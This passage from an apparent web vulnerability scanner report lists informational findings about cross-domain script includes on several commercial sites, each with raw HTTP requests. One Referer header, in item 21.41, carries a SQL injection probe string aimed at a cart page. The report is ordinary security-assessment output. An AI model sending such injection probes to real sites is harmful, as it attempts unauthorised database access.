<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   


...[SNIP]...
</script>

   <script language="JavaScript" src="https://seal.networksolutions.com/siteseal/javascript/siteseal.js" type="text/javascript"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" language="javascript" src="//verify.authorize.net/anetseal/seal.js" ></script>
...[SNIP]...

21.38. http://www.clone-systems.com/ecommerce/categories/Vulnerability-Scan-Services/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clone-systems.com
Path:   /ecommerce/categories/Vulnerability-Scan-Services/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ecommerce/categories/Vulnerability-Scan-Services/ HTTP/1.1
Host: www.clone-systems.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMSSESSIDe4d04fcf=rqtsjtdic4ntsneeiknvckvj63

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:55:47 GMT
Server: Apache
Set-Cookie: SHOP_SESSION_TOKEN=bk4mm1ag6ue392h3jsauk88r25; expires=Tue, 26-Apr-2011 23:55:47 GMT; path=/ecommerce/; domain=.clone-systems.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 23560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   


...[SNIP]...
</script>

   <script language="JavaScript" src="https://seal.networksolutions.com/siteseal/javascript/siteseal.js" type="text/javascript"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" language="javascript" src="//verify.authorize.net/anetseal/seal.js" ></script>
...[SNIP]...

21.39. http://www.clone-systems.com/ecommerce/products/Penetration-Testing-On-Demand.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clone-systems.com
Path:   /ecommerce/products/Penetration-Testing-On-Demand.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ecommerce/products/Penetration-Testing-On-Demand.html HTTP/1.1
Host: www.clone-systems.com
Proxy-Connection: keep-alive
Referer: http://www.clone-systems.com/ecommerce/categories/Penetration-Testing/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SHOP_SESSION_TOKEN=ledng76mlqmvtdngb8nt64bh55; STORE_VISITOR=1; CMSSESSIDe4d04fcf=rqtsjtdic4ntsneeiknvckvj63

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:56:13 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: RECENTLY_VIEWED_PRODUCTS=8; expires=Wed, 25-May-2011 23:56:13 GMT; path=/ecommerce/; domain=.clone-systems.com
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 33495

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   


...[SNIP]...
</script>

   <script language="JavaScript" src="https://seal.networksolutions.com/siteseal/javascript/siteseal.js" type="text/javascript"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" language="javascript" src="//verify.authorize.net/anetseal/seal.js" ></script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?pub=xa-4aa4857d5e87e10e"></script>
...[SNIP]...

21.40. http://www.clone-systems.com/pci-scanning.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clone-systems.com
Path:   /pci-scanning.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pci-scanning.html HTTP/1.1
Host: www.clone-systems.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:45:22 GMT
Server: Apache
Set-Cookie: CMSSESSIDe4d04fcf=s3t5qkd9ses049sa9ue07c8l81; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Mon, 25 Apr 2011 23:45:22 GMT
X-Powered-By: Nette Framework
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 16914

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" ><head>

<title>PCI S
...[SNIP]...
<link href="greybox/gb_styles.css" rel="stylesheet" type="text/css" />

<script language="JavaScript" src="https://seal.networksolutions.com/siteseal/javascript/siteseal.js" type="text/javascript"></script>
...[SNIP]...

21.41. https://www.clone-systems.com/ecommerce/checkout.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.clone-systems.com
Path:   /ecommerce/checkout.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ecommerce/checkout.php HTTP/1.1
Host: www.clone-systems.com
Connection: keep-alive
Referer: http://www.clone-systems.com/ecommerce/cart.php?suggest=0&1'%20and%201%3d1--%20=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SHOP_SESSION_TOKEN=ledng76mlqmvtdngb8nt64bh55; STORE_VISITOR=1; RECENTLY_VIEWED_PRODUCTS=8

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:59:25 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 72179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   


...[SNIP]...
</script>

   <script language="JavaScript" src="https://seal.networksolutions.com/siteseal/javascript/siteseal.js" type="text/javascript"></script>
...[SNIP]...

21.42. http://www.comodo.com/business-security/pci-compliance/pci-scan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.comodo.com
Path:   /business-security/pci-compliance/pci-scan.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-security/pci-compliance/pci-scan.php HTTP/1.1
Host: www.comodo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=44439b28ed50f35415dffbf574898661; __utmz=1.1303775073.1.1.utmgclid=CMO8iMjsuKgCFQ5-5Qodm1pYEg|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.840845901.1303775073.1303775073.1303775073.1; __utmc=1; __utmb=1.2.10.1303775073; ap=; referrerURL=; entryURL=http%3A//www.comodo.com/resources/webinars/e-commerce/pci-compliance-demystified.php%3Fgclid%3DCMO8iMjsuKgCFQ5-5Qodm1pYEg; wooTracker=ZQXK7Q954RCS6ZFI1HH4JS1QZ5D1UD01; currency=USD; region=North%20America; country=US

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 23:45:31 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 61662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</div>
       <script type="text/javascript" src="//s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...

21.43. http://www.comodo.com/contact-comodo/contact-us.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.comodo.com
Path:   /contact-comodo/contact-us.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /contact-comodo/contact-us.php HTTP/1.1
Host: www.comodo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=44439b28ed50f35415dffbf574898661; __utmz=1.1303775073.1.1.utmgclid=CMO8iMjsuKgCFQ5-5Qodm1pYEg|utmccn=(not%20set)|utmcmd=(not%20set); ap=; referrerURL=; entryURL=http%3A//www.comodo.com/resources/webinars/e-commerce/pci-compliance-demystified.php%3Fgclid%3DCMO8iMjsuKgCFQ5-5Qodm1pYEg; wooTracker=ZQXK7Q954RCS6ZFI1HH4JS1QZ5D1UD01; sifrFetch=true; currency=USD; region=North%20America; country=US; __utma=1.840845901.1303775073.1303775073.1303775073.1; __utmc=1; __utmb=1.6.10.1303775073

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 23:51:50 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 54537

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</div>
       <script type="text/javascript" src="//s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...

21.44. http://www.comodo.com/resources/webinars/e-commerce/pci-compliance-demystified.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.comodo.com
Path:   /resources/webinars/e-commerce/pci-compliance-demystified.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /resources/webinars/e-commerce/pci-compliance-demystified.php?gclid=CMO8iMjsuKgCFQ5-5Qodm1pYEg HTTP/1.1
Host: www.comodo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 23:45:13 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Set-Cookie: PHPSESSID=9e713970eaa1e4a66f527fc3b1a40f5c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 58628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</div>
       <script type="text/javascript" src="//s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...

21.45. http://www.comodo.com/support/comodo-support.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.comodo.com
Path:   /support/comodo-support.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /support/comodo-support.php HTTP/1.1
Host: www.comodo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=44439b28ed50f35415dffbf574898661; __utmz=1.1303775073.1.1.utmgclid=CMO8iMjsuKgCFQ5-5Qodm1pYEg|utmccn=(not%20set)|utmcmd=(not%20set); ap=; referrerURL=; entryURL=http%3A//www.comodo.com/resources/webinars/e-commerce/pci-compliance-demystified.php%3Fgclid%3DCMO8iMjsuKgCFQ5-5Qodm1pYEg; wooTracker=ZQXK7Q954RCS6ZFI1HH4JS1QZ5D1UD01; sifrFetch=true; __utma=1.840845901.1303775073.1303775073.1303775073.1; __utmc=1; __utmb=1.4.10.1303775073; currency=USD; region=North%20America; country=US

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 23:51:48 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 50763

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</div>
       <script type="text/javascript" src="//s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...

21.46. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/like.php?&width=400&height=80&layout=standard&show_faces=true&action=like&font=arial&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110426_0700%26ssh%3DS583531935%26FORM%3DHPFBLK%26mkt%3Den-US%26 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.26.63
X-Cnection: close
Date: Tue, 26 Apr 2011 13:54:02 GMT
Content-Length: 8460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/nogz-s5wETe.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/I8QAd_a7Pbh.js"></script>
...[SNIP]...

21.47. http://www.genbook.com/bookings/booknowjstag.action  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.genbook.com
Path:   /bookings/booknowjstag.action

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bookings/booknowjstag.action?id=30134654&bookingSourceId=1000 HTTP/1.1
Host: www.genbook.com
Proxy-Connection: keep-alive
Referer: http://www.afreshbunch.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:43:48 GMT
Server: Jetty(6.1.21)
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript; charset=UTF-8
Set-Cookie: JSESSIONID=1svklbmve2bqs.cb2;Path=/bookings
X-UA-Compatible: IE=7
Content-Length: 876


var goTimer;
function urchinCheck() {
clearTimeout(goTimer);
try
{
urchinTracker("/booknowtag/30134654");
} catch (e) {
goTimer = window.setTimeout(urchinCheck
...[SNIP]...
</a>' + sWrite)
document.writeln('<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

21.48. https://www.hackerguardian.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.hackerguardian.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.hackerguardian.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=212060173.; __utmxx=212060173.; __utmz=212060173.1303748935.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=212060173.423105898.1303748935.1303748935.1303748935.1; currency=USD; region=North%20America; country=US

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:58:34 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 18249
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Hackerguardian Home
...[SNIP]...
</script>
<script type="text/javascript" src="//secure.comodo.com/prices.js"></script>
<!--google-->
<script type="text/javascript" src="//google-analytics.com/urchin.js" >
</script>
...[SNIP]...
</span><script type="text/javascript" src="//forums.comodo.com/rss.php?i=1&amp;t=1&amp;l=1&amp;n=1&amp;d=1&amp;w=1&amp;url=http://www.comodo.com/rss.xml"></script>
...[SNIP]...

21.49. https://www.hackerguardian.com/hackerguardian/buy/pci_free_scan.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.hackerguardian.com
Path:   /hackerguardian/buy/pci_free_scan.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /hackerguardian/buy/pci_free_scan.html HTTP/1.1
Host: www.hackerguardian.com
Connection: keep-alive
Referer: https://www.hackerguardian.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=212060173.; __utmxx=212060173.; __utmz=212060173.1303748935.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=212060173.423105898.1303748935.1303748935.1303748935.1; currency=USD; region=North%20America; country=US; ap=; referrerURL=; entryURL=https%3A//www.hackerguardian.com/

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:00:41 GMT
Server: Apache
Accept-Ranges: bytes
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 16078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free HackerGuar
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/ssl-certificate-css/body.css" media="all" />


<script type="text/javascript" src="//secure.comodo.com/hostedLogin/sha1.js"></script>
<script type="text/javascript" src="//secure.comodo.com/hostedLogin/login.js"></script>
...[SNIP]...
<!--google-->
<script type="text/javascript" src="//google-analytics.com/urchin.js" >
</script>
...[SNIP]...
<!--END FOOTER -->

<script type="text/javascript" src="//secure.comodo.com/prices.js"></script>
...[SNIP]...

21.50. https://www.hackerguardian.com/javascript/functions.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.hackerguardian.com
Path:   /javascript/functions.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /javascript/functions.js HTTP/1.1
Host: www.hackerguardian.com
Connection: keep-alive
Referer: https://www.hackerguardian.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=212060173.; __utmxx=212060173.; __utmz=212060173.1303748935.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=212060173.423105898.1303748935.1303748935.1303748935.1; currency=USD; region=North%20America; country=US

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:58:38 GMT
Server: Apache
Last-Modified: Tue, 08 Feb 2011 21:12:56 GMT
ETag: "18870-3998-49bcbcfee2600"
Accept-Ranges: bytes
Content-Length: 14744
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: application/x-javascript

function createCookie(name,value,days) {
   if (days) {
       var date = new Date();
       date.setTime(date.getTime()+(days*24*60*60*1000));
       var expires = "; expires="+date.toGMTString();
   }
   else var
...[SNIP]...
<div style="position:absolute;right:317px;top:24px;">');
document.write('<script type="text/javascript" src="http://c3.chatsupportlive.com/js/status_image.php?base_url=http://c3.chatsupportlive.com&l=comodo4support&x=78&deptid=190&"><a href="http://www.phplivesupport.com">
...[SNIP]...

21.51. https://www.hackerguardian.com/ssl-certificate-products/ssl-certificate-index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.hackerguardian.com
Path:   /ssl-certificate-products/ssl-certificate-index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ssl-certificate-products/ssl-certificate-index.html HTTP/1.1
Host: www.hackerguardian.com
Connection: keep-alive
Referer: https://www.hackerguardian.com/hackerguardian/buy/pci_free_scan.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=212060173.; __utmxx=212060173.; __utmz=212060173.1303748935.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=212060173.423105898.1303748935.1303748935.1303748935.1; ap=; referrerURL=; entryURL=https%3A//www.hackerguardian.com/; currency=USD; region=North%20America; country=US

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:06:07 GMT
Server: Apache
Accept-Ranges: bytes
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 22107

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Comodo Products
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/ssl-certificate-css/sslcertindex.css" media="all" />
<script type="text/javascript" src="//secure.comodo.com/hostedLogin/sha1.js"></script>
<script type="text/javascript" src="//secure.comodo.com/hostedLogin/login.js"></script>
...[SNIP]...
<!--google-->
<script type="text/javascript" src="//google-analytics.com/urchin.js" ></script>
...[SNIP]...
<!--END FOOTER -->

<script type="text/javascript" src="//secure.comodo.com/prices.js"></script>
...[SNIP]...

21.52. http://www.hugthecloud.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hugthecloud.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.hugthecloud.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:18:27 GMT
Server: Jetty/5.1.15 (SunOS/5.10 x86 java/1.6.0_03
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: xn_visitor=ee890453-6b17-46ae-a9d8-af6fdfda375d;Path=/;Domain=.hugthecloud.com;Expires=Fri, 23-Apr-21 13:18:27 GMT
Set-Cookie: ning_session=3DtBNRdYb0ZI8bIxNwyKF8vI8uD7jqsGwx9yRIPU6xi52l4UL5heqChGDHvXjopviwdKMsemcLE=;Path=/;Domain=.hugthecloud.com;Expires=Tue, 26-Apr-11 14:18:27 GMT
X-XN-Trace-Token: 94f68857-016c-408c-9214-fd573d274bbe
X-XN-XNHTML: false
Date: Tue, 26 Apr 2011 12:39:16 GMT
Date: Tue, 26 Apr 2011 12:39:16 GMT
Vary: X-XN_APPLICATION
P3P: CP="UNI STA LOC CURa OURa COR ALL IND"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Last-Modified: Tue, 26 Apr 2011 12:39:16 UTC
CACHE-CONTROL: max-age=0
CACHE-CONTROL: no-cache="Set-Cookie"
Content-Type: text/html; charset=utf-8
Server: Ning HTTP Server 2.0
Content-Length: 54058

<!DOCTYPE html>
<html lang="en">
<head data-layout-view="default">
<script>(function(){var d={date:8,app:"s",host:"s",ip:4,ua:"s",user:"s",url:"s",html:4,css:4,render:4,js:4,nlr:4,nlr_eval
...[SNIP]...
</div>
<script type="text/javascript" src="http://twitter.com/javascripts/blogger.js">
</script><script type="text/javascript" src="http://twitter.com/statuses/user_timeline/hugthecloud.json?callback=twitterCallback2&amp;count=5">
</script>
...[SNIP]...
<br />
<script type="text/javascript" src="http://feeds.delicious.com/v2/js/networkbadge/hugthecloud?showadd&amp;icon=m&amp;name&amp;itemcount&amp;nwcount&amp;fancount">
</script>
...[SNIP]...
</script><script type="text/javascript" src="http://static.ning.com/socialnetworkmain/widgets/lib/core.min.js?v=201104212158"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://static.ning.com/socialnetworkmain/widgets/lib/js/thrift/xn_track.min.js?v=201104212158"></script>
...[SNIP]...

21.53. https://www.instantssl.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
